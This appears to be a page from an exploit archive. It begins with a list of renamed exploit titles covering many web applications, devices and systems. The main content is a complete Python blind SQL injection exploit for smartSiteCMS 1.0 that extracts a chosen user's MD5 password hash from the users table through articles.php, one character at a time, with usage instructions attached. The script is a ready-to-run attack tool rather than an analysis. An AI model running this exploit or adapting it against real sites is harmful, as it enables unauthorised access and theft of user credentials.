477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
60 lines
1.7 KiB
Python
Executable file
60 lines
1.7 KiB
Python
Executable file
#!/usr/bin/python
|
|
|
|
import sys
|
|
import re
|
|
from socket import *
|
|
|
|
class exploit:
|
|
def __init__(self,host,path,user):
|
|
self.host=host
|
|
self.path=path
|
|
self.user=user
|
|
self.reg=re.compile("<!-- END COMMENT FORM -->")
|
|
def set_query(self,n,ch):
|
|
self.query="' OR ASCII(SUBSTRING((SELECT password FROM users WHERE userName='"+self.user+"'),"+str(n)+",1)) = "+str(ord(ch))+" OR '1'='2"
|
|
self.query = self.query.replace(" ","%20")
|
|
self.query = self.query.replace("'","%27")
|
|
self.request="GET "+self.path+"/articles.php?var="+self.query+" HTTP/1.0\r\nHost: "+self.host+"\r\n\n"
|
|
def check(self):
|
|
sock=socket(AF_INET, SOCK_STREAM)
|
|
sock.connect((self.host, 80))
|
|
sock.send(self.request)
|
|
r=""
|
|
t="-"
|
|
while(t!=""):
|
|
t=sock.recv(1024)
|
|
r+=t
|
|
match=self.reg.search(r)
|
|
if(r[match.start()+27:match.start()+59]!="<!-- END OF RELATED ARTICLES -->"):
|
|
return 1
|
|
else:
|
|
return 0
|
|
sock.close()
|
|
|
|
print "////*****************************************\\\\\\\\"
|
|
print "|||| smartSiteCMS 1.0 v1.0 ||||"
|
|
print "|||| Blind SQL injection ||||"
|
|
print "|||| ||||"
|
|
print "|||| ~Author: certaindeath ||||"
|
|
print "|||| ~Greetz: darkjoker ||||"
|
|
print "\\\\\\\\*****************************************////\n"
|
|
|
|
if(len(sys.argv) !=4 ):
|
|
print "Usage: python xpl.py <host> <cms path> <user>"
|
|
print "Example: python xpl.py localhost /cms admin"
|
|
sys.exit(0)
|
|
|
|
pwd=""
|
|
xpl = exploit(sys.argv[1],sys.argv[2],sys.argv[3])
|
|
n=1
|
|
while(n<=32):
|
|
t=0
|
|
xpl.set_query(n,str(t))
|
|
while (xpl.check()!=1):
|
|
t+=1
|
|
xpl.set_query(n,str(hex(t))[-1])
|
|
pwd+=str(hex(t))[-1]
|
|
n+=1
|
|
print "pass [md5]: ",pwd
|
|
|
|
# milw0rm.com [2009-01-28]
|